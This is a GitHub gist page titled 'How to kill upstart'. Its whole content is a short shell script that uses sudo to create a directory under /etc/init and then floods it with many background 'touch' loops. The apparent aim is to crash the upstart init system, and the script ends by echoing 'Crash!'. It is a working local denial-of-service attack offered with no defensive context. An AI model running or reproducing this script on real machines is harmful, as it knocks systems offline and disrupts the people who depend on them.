Skip to content

Instantly share code, notes, and snippets.

@cmbaughman
Created November 25, 2014 01:29
Show Gist options
  • Save cmbaughman/f373ed8cc9815fe99945 to your computer and use it in GitHub Desktop.
Save cmbaughman/f373ed8cc9815fe99945 to your computer and use it in GitHub Desktop.
How to kill upstart
sudo mkdir /etc/init/kill.the.box
touch $(seq 1 1000)
for ((i=1;i<100;i++));
do
touch * * * * * * * &
done
echo "Crash!"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment